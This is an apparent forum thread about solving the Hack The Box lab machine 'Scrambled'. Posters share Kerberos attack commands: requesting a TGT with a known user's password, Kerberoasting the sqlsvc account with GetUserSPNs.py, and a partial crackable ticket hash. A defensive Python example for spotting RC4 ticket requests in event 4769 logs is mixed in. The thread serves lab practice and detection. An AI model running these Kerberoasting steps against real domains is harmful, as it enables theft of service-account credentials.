Scrambled - HTB [Discussion]
LOGON;username=ksimpson&password=ksimpson
ERROR_INVALID_CREDENTIALS;

Not sure if this does anything but you can add ;

I tried several variations with no luck. No luck on smb or psexec, and no luck using win-rm. Unsure if 5895 is a web server or not.
Reply
get ksimpson's TGT:

getTGT "kerberos+pass://scrm.local\ksimpson:[email protected]" krb_ccache

use kerberos login to get sqlsvc TGS for cracking:

GetUserSPNs.py -dc-ip dc1.scrm.local scrm.local/sqlsvc -request -k -no-pass

ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2022-06-11 21:41:15.566050
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 12:32:02.351452  2022-06-11 21:41:15.566050

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$488b33086784ae1b2e7ebdad2f41bb3a$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
Reply
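
For defenders, the service-ticket request in the post above leaves a trace on the domain controller: a Security event 4769 with ticket encryption type 0x17 (RC4, the `23` in `$krb5tgs$23$`) issued for a user-backed service account. The following is an added example, not part of the thread; the event records are constructed (including the second requester, `asmith`) and it assumes the logs are already parsed into dicts.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the "23" in the $krb5tgs$23$ hash format

# Constructed 4769 records, already parsed into dicts. Field names follow the
# Windows Security event 4769 schema; every value here is made up.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL", "ServiceName": "DC1$",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "asmith@SCRM.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x12", "Status": "0x0"},         # AES ticket: not flagged
    {"EventID": 4769, "TargetUserName": "asmith@SCRM.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0xffffffff", "Status": "0x20"},  # failed request
]


def suspicious_tgs_requests(events):
    """Return successful 4769 events that issued an RC4 ticket for a user-backed service."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
            continue
        service = ev.get("ServiceName", "")
        # Machine accounts (trailing '$') and krbtgt use long random secrets,
        # so tickets for them are not the concern here.
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        if int(ev.get("TicketEncryptionType", "0x0"), 16) == RC4_HMAC:
            hits.append(ev)
    return hits


def summarize(hits):
    """Map each requesting account to the sorted service accounts it targeted."""
    by_requester = defaultdict(set)
    for ev in hits:
        by_requester[ev["TargetUserName"]].add(ev["ServiceName"])
    return {who: sorted(services) for who, services in by_requester.items()}


if __name__ == "__main__":
    for who, services in summarize(suspicious_tgs_requests(SAMPLE_EVENTS)).items():
        print(f"{who} requested RC4 service tickets for: {', '.join(services)}")
```

RC4 requests can also come from legacy clients, so hits are leads to triage against the account's normal behaviour rather than verdicts.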
(June 12, 2022, 03:42 AM)thomasratkos Wrote: get ksimpson's TGT:

getTGT "kerberos+pass://scrm.local\ksimpson:[email protected]" krb_ccache


use kerberos login to get sqlsvc TGS for cracking:

GetUserSPNs.py  -dc-ip dc1.scrm.local scrm.local/sqlsvc -request -k -no-pass

ServicePrincipalName          Name    MemberOf  PasswordLastSet            LastLogon                  Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2022-06-11 21:41:15.566050           
MSSQLSvc/dc1.scrm.local      sqlsvc            2021-11-03 12:32:02.351452  2022-06-11 21:41:15.566050           



$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$488b33086784ae1b2e7ebdad2f41bb3a$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


Cheers for this post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?
Reply
(June 12, 2022, 04:16 AM)skyweasel Wrote:
(June 12, 2022, 03:42 AM)thomasratkos Wrote: get ksimpson's TGT:

getTGT "kerberos+pass://scrm.local\ksimpson:[email protected]" krb_ccache


use kerberos login to get sqlsvc TGS for cracking:

GetUserSPNs.py  -dc-ip dc1.scrm.local scrm.local/sqlsvc -request -k -no-pass

ServicePrincipalName          Name    MemberOf  PasswordLastSet            LastLogon                  Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2022-06-11 21:41:15.566050           
MSSQLSvc/dc1.scrm.local      sqlsvc            2021-11-03 12:32:02.351452  2022-06-11 21:41:15.566050           



$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$488b33086784ae1b2e7ebdad2f41bb3a$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



Hmm I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?


Getting the same error. The actual error appears to be something to do with it negotiating with SMB rather than Kerberos. Other impacket tools work with Kerberos auth, like smbclient.py, smbexec.py, etc.

    if ans.isValidAnswer(STATUS_MORE_PROCESSING_REQUIRED):
  File "/usr/lib/python3/dist-packages/impacket/smb3structs.py", line 458, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_NOT_SUPPORTED(The request is not supported.)
Reply
(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for this post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?


it's a problem with the tool, not you.. do some Google searching, you might find the creator of the box on GitHub trying to get this issue fixed  :D

I hit a wall after this so if anyone has a nudge after this lmk please   😎
Reply
I'm at the same point. I think the sqlsvc is a bit useless

I'm fuzzing parameters in the 4411 port
Reply
(June 12, 2022, 05:08 AM)vergun Wrote: I'm at the same point. I think the sqlsvc is a bit useless

I'm fuzzing parameters in the 4411 port


I tried to get Bloodhound.py to work over Kerberos and generic LDAP auth - both failed for different reasons. Looks like bloodhound.py doesn't support regular auth in case of channel binding being mandatory:
https://github.com/fox-it/BloodHound.py/issues/55

And, because Kerberos auth implementation in bh.py is incomplete, even after proxying all the necessary A and SRV records with DNSChef, you still get errors and can't connect.
Reply
(June 12, 2022, 04:32 AM)thomasratkos Wrote:
(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for this post/nudge.

I keep getting "[-] exceptions must derive from BaseException"  from GetUserSPNs.py

annoying.

care to paste the full tgs?



it's a problem with the tool, not you.. do some Google searching, you might find the creator of the box on GitHub trying to get this issue fixed  :D


I hit a wall after this so if anyone has a nudge after this lmk please   😎


Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py using both users to query the Windows registry (different results).

And now.. I'm stuck again :(


@qwerty173 / @jon01 any nudge? :D
Reply
There is another user called "VbScrub" found using exiftool on this image
Reply
(June 12, 2022, 07:49 AM)fironeDerbert Wrote: There is another user called "VbScrub" found using exiftool on this image


VbScrub is the creator of this machine... And according to Kerberos, this is not a valid username..
Reply

